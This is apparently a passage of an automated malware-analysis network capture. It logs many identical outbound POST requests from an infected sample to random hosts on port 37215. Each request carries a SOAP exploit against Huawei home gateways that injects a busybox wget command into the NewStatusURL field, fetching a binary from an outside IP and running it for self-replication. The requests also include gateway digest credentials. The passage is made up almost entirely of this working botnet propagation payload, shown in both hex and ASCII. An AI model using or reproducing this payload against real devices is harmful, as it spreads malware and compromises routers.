                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2127192.168.2.2334156197.235.243.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622915030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2128192.168.2.235342650.81.33.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622929096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2129192.168.2.2358894219.60.149.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.623079062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2130192.168.2.2353890197.175.46.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.623117924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2131192.168.2.2359098197.157.46.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.623151064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2132192.168.2.233753641.36.237.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.623210907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2133192.168.2.2340406197.196.181.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.623565912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2134192.168.2.233515441.241.19.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.624169111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2135192.168.2.2358632157.164.115.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.624753952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2136192.168.2.2349800157.4.141.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.624913931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
